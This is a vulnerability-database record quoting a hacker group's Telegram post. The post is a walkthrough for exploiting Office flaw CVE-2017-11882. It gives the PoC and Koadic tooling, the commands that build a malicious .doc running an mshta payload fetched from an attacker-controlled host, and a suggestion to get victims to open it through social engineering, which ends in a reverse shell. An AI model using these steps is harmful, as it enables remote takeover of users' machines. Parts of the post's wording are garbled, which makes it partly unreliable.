{"uuid": "782c7c14-243e-4d1c-9172-65475f620152", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2017-11882", "type": "exploited", "source": "https://t.me/indoghostsec/1934", "content": "By indoghostsec\n\n Office Memory Corruption Vulnerability CVE-2017-11882 Failed to execute arbitrary code, DoS PoC has been released:\nfb.com/indoghostsec\n\n1) Microsoft Office once again revealed a memory corru:ption vulnerability\u2002 , CVEID  CVE-2017-11882\u2002 , which can be exploited by an attacker to execute arbitrary code in the context of the currently logged-in user. \n\n2) A failed development attempt may cause a denial of service condition. The affected versions include related versions of Office 2016, Office 2013, Office 2010, and Office 2007.\n\n3) Update: The Microsoft Office Memory Corruption Vulnerability CVE-2017-11882 PoC has been released. The reason it is widely spread is that this vulnerability has no sputum, and users cannot feel it! !! !! Here is a simple reproduction for everyone. .\n\n \n Tools used:\n\n1) Infiltration tool: kodiac (used to construct the payload and get the shell) Tool address: https://github.com/weiruyi123/koadic (This is the version I modified without coding errors)\n\n2) Vulnerability Poc: Address: https://github.com/weiruyi123/CVE-2017-11882\n\n(Poc has a limit on the command length. For details, please refer to the README on github.)\n\nOperating environment:\n\n1) Python2.7\n\n2) Target: windows server 2008 R2 standard IP: 192.168.1.171\n\n3) Attack machine: A VPS with a public IP (because I don't want to do forwarding, I use the VPS as a rebound shell service to show everyone)\n\n4) Enter bash, cd into the downloaded Poc directory, we can see that Poc is written in python, so you need to install the python environment.\n\nNext we open the win server virtual machine\n\n5) Newly installed virtual machine (without any patches).\n\nHere I use ssh to link my vps and use git clone to download kodiac. After recursively adding execute permissions to the directory, cd into the kodiac directory and then. /kodiac.py runs, the same tool also requires a python environment\n\n6)Then we set the LHOST and LPORT mosaics and fill in your intranet IP address (if it is an intranet penetration) or port forwarding address, and then enter run to generate the payload\n\n 7) Copy 'mshta http: // IP: 2580 / acg9N' and then go back to bash to open the Poc directory. The usage of Poc is\n\npython Command_CVE-2017-11882.py -c \"cmd.exe / c calc.exe\" -o test.doc\n\n-c refers to the command executed remotely -o refers to the generated document location. We modify the command and save location at -c according to the situation, here according to the payload command I generated is\n\npython Command_CVE-2017-11882.py -c \"mshta http: // IP: 2580 / acg9N\" -o test.doc\n\nOf course, you can also use msf to generate a powershell one-sentence payload and then replace the parameter at -c\n\n8) It can be seen that we have successfully generated a malicious document (check picture sended by UndercOde\n\n9)  Next, you only need to open it through some social workers or abnormal means. we will open the document into the win server virtual machine.\n\n10) Then you will find that the zombies shell with code 0 has been rebounded at kodiac, and there is no error message after the target is opened\n\nWritten by INDOGHOSTSEC", "creation_timestamp": "2020-02-18T08:18:41.000000Z"}